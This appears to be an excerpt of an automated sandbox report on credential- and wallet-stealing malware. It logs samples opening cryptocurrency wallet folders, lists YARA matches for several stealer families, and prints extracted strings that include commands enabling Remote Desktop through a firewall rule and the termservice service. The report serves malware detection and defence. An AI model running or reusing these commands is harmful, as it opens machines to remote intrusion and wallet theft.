                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                      Source: 8e933e9d51.exeBinary or memory string: WIN_81
                                      Source: 8e933e9d51.exeBinary or memory string: WIN_XP
                                      Source: 8e933e9d51.exe, 00000012.00000002.1531510429.0000000000702000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                                      Source: 8e933e9d51.exeBinary or memory string: WIN_XPe
                                      Source: 8e933e9d51.exeBinary or memory string: WIN_VISTA
                                      Source: 8e933e9d51.exeBinary or memory string: WIN_7
                                      Source: 8e933e9d51.exeBinary or memory string: WIN_8
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeDirectory queried: C:\Users\user\Documents
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeDirectory queried: C:\Users\user\Documents
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHV
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHV
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOY
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOY
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCS
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOY
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOY
                                      Source: Yara matchFile source: 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000010.00000003.1467013696.0000000001337000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: Process Memory Space: UD49QH6.exe PID: 6024, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: m0wsoI3.exe PID: 5132, type: MEMORYSTR
                                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                                      Remote Access Functionality

                                      barindex
                                      Yara detected LummaC Stealer
                                      Source: Yara matchFile source: Process Memory Space: UD49QH6.exe PID: 6024, type: MEMORYSTR
                                      Source: Yara matchFile source: 48.2.cronikxqqq.exe.3c89550.0.raw.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 49.2.cronikxqqq.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 49.2.cronikxqqq.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000031.00000002.1772447973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                      Yara detected Mars stealer
                                      Source: Yara matchFile source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 17.0.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000011.00000002.1518189012.000000000043C000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000011.00000000.1442265227.000000000043C000.00000080.00000001.01000000.0000000E.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000006.00000003.5645957689.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000011.00000002.1518022147.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\m0wsoI3[1].exe, type: DROPPED
                                      Yara detected PureLog Stealer
                                      Source: Yara matchFile source: 48.2.cronikxqqq.exe.3c89550.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 48.0.cronikxqqq.exe.870000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 48.2.cronikxqqq.exe.3c89550.0.raw.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000030.00000000.1635997111.0000000000872000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\cronikxqqq[1].exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe, type: DROPPED
                                      Yara detected Stealc
                                      Source: Yara matchFile source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000011.00000002.1518022147.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                                      Yara detected Vidar stealer
                                      Source: Yara matchFile source: 17.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000011.00000002.1518022147.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                                      Source: Yara matchFile source: Process Memory Space: m0wsoI3.exe PID: 5132, type: MEMORYSTR
                                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                      Contains functionality to start a terminal service
                                      Source: M6gQuZPvgY.exeString found in binary or memory: net start termservice
                                      Source: M6gQuZPvgY.exe, 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: net start termservice
                                      Source: M6gQuZPvgY.exe, 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                      Source: rapes.exeString found in binary or memory: net start termservice
                                      Source: rapes.exe, 00000002.00000002.1039110891.0000000000241000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: net start termservice
                                      Source: rapes.exe, 00000002.00000002.1039110891.0000000000241000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                      Source: rapes.exeString found in binary or memory: net start termservice
                                      Source: rapes.exe, 00000003.00000002.1046270812.0000000000241000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: net start termservice
                                      Source: rapes.exe, 00000003.00000002.1046270812.0000000000241000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 